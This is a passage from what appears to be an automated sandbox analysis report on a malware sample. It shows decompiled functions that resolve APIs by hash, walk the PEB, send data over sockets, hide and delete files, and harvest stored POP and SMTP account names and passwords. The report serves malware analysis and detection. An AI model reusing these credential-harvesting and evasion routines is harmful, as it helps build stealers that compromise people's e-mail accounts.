                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                              0x0040643c
                                              0x00406445
                                              0x00406454

                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                              0x00404eed
                                              0x00404ef2
                                              0x00404efd
                                              0x00404efd
                                              0x00404f07
                                              0x00404f0e

                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                              0x00403bdd
                                              0x00403beb
                                              0x00403bee

                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                              0x0040428a
                                              0x00404297
                                              0x0040429a

                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                              0x00404a27
                                              0x00404a35
                                              0x00404a38

                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                              0x00403c4d
                                              0x00403c55
                                              0x00403c58

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                              0x00403c15
                                              0x00403c1d
                                              0x00403c20

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                              0x00402c2c
                                              0x00402c34
                                              0x00402c37

                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                              0x00403bfc
                                              0x00403c04
                                              0x00403c07

                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                              0x00403bc4
                                              0x00403bcc
                                              0x00403bcf

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                              0x00404a0d
                                              0x00404a15
                                              0x00404a18

                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                              0x00403b72
                                              0x00403b7a
                                              0x00403b7d

                                              APIs
                                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID:
                                              • API String ID: 1174141254-0
                                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: closesocket
                                              • String ID:
                                              • API String ID: 2781271927-0
                                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                              0x00403fac
                                              0x00403fba
                                              0x00403fbe

                                              APIs
                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                              0x0040647f
                                              0x00406487
                                              0x0040648a

                                              APIs
                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                              0x004058f8
                                              0x00405903
                                              0x00405906

                                              APIs
                                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                              • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                              0x00405932
                                              0x0040593d
                                              0x00405940

                                              APIs
                                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                              • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                              • String ID:
                                              • API String ID: 1312198159-0
                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                              0x0040d070
                                              0x0040d080
                                              0x0040d084
                                              0x0040d086
                                              0x0040d08c
                                              0x0040d0a0
                                              0x0040d0ae
                                              0x0040d0bd
                                              0x0040d0c0
                                              0x0040d0c5
                                              0x0040d0c9
                                              0x0040d0e3
                                              0x0040d0f2
                                              0x0040d101
                                              0x0040d104
                                              0x0040d109
                                              0x0040d110
                                              0x0040d11e
                                              0x0040d123
                                              0x0040d126
                                              0x0040d12d
                                              0x0040d145
                                              0x0040d154
                                              0x0040d15a
                                              0x0040d166
                                              0x0040d174
                                              0x0040d186
                                              0x0040d18e
                                              0x0040d19a
                                              0x0040d1ac
                                              0x0040d1ba
                                              0x0040d1cc
                                              0x0040d1d1
                                              0x0040d1dd
                                              0x0040d1e2
                                              0x0040d1e7
                                              0x0040d1e7
                                              0x0040d1e7
                                              0x0040d1eb
                                              0x0040d1f1
                                              0x0040d1f7
                                              0x0040d1ff
                                              0x0040d207
                                              0x0040d20f
                                              0x0040d217
                                              0x0040d21f
                                              0x0040d227
                                              0x0040d230

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                              • API String ID: 0-2111798378
                                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
